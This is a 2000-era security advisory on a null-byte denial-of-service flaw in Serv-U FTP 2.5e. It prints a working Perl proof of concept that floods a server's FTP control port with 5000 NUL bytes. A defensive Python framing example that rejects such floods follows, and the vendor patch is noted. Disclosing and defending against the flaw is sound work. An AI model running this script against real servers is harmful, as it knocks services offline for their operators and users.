FTP Serv-U 2.5e Subject to Denial of Service

By sending 5000 null bytes to the FTP service, the service can be made to crash.

ITPro Today

August 6, 2000


Reported August 7, 2000 by Blue Panda

VERSIONS AFFECTED

FTP Serv-U 2.5e

DESCRIPTION

The Serv-U FTP service can be made to generate stack faults by sending it approximately 5000 null bytes on the control connection. Such an attack can leave the underlying operating system unstable, to the point where it may eventually crash.

DEMONSTRATION

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use strict;
use warnings;
use IO::Socket;

my $host = "ftp.host.com";   # placeholder host name
my $port = 21;               # FTP control port

print "Connecting to $host:$port...";
my $socket = IO::Socket::INET->new(Proto    => "tcp",
                                   PeerAddr => $host,
                                   PeerPort => $port)
    or die "failed: $@\n";
print "done.\n";

# Build a buffer of 5000 NUL (0x00) bytes and send it as one write.
my $buf = "\x00" x 5000;
print $socket $buf;

sleep(4);
close($socket);
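As an added, defender-side example (not part of the advisory and not Serv-U code), the reader below shows the framing discipline that keeps a null-byte flood like the one above away from the command handler: NUL bytes are counted and dropped rather than buffered, and a command line is capped before it is parsed. The 512-byte line cap and the 1024-byte flood threshold are assumptions chosen for this example, and the sample stream is constructed.

```python
# Added example: bounded FTP control-channel framing (not Serv-U code).
from typing import List, Tuple

MAX_LINE = 512    # assumed cap on one command line, excluding CRLF
NUL_ALERT = 1024  # assumed: a run of NULs this long is reported as a flood

def frame_commands(stream: bytes) -> List[Tuple[str, str]]:
    """Split a raw client->server stream into ('command', text) and
    ('reject', reason) events. NULs are counted but never buffered, so a
    flood cannot grow the line buffer; over-long lines are dropped to LF.
    """
    events: List[Tuple[str, str]] = []
    buf = bytearray()
    nul_run = 0
    discard = False

    def close_nul_run() -> None:
        nonlocal nul_run
        if nul_run >= NUL_ALERT:
            events.append(("reject", f"nul-flood of {nul_run} bytes"))
        nul_run = 0

    for b in stream:
        if b == 0:
            nul_run += 1          # count it, do not buffer it
            continue
        close_nul_run()
        if discard:               # skipping the tail of an over-long line
            discard = b != 0x0A
            continue
        if b == 0x0A and buf.endswith(b"\r"):
            line = bytes(buf[:-1])
            buf.clear()
            if all(0x20 <= c < 0x7F for c in line):
                events.append(("command", line.decode("ascii")))
            else:
                events.append(("reject", "non-printable byte in command"))
            continue
        buf.append(b)
        if len(buf) > MAX_LINE:
            events.append(("reject", f"line exceeds {MAX_LINE} bytes without CRLF"))
            buf.clear()
            discard = True
    close_nul_run()
    return events

# Constructed sample: a login exchange with 5000 NULs injected between commands.
SAMPLE = b"USER anonymous\r\n" + b"\x00" * 5000 + b"PASS guest\r\n"
```

Running `frame_commands(SAMPLE)` yields the two commands plus one reject event recording the 5000-byte flood, with nothing ever accumulated in the line buffer.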

VENDOR RESPONSE

The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.  

CREDIT
Discovered by Blue Panda
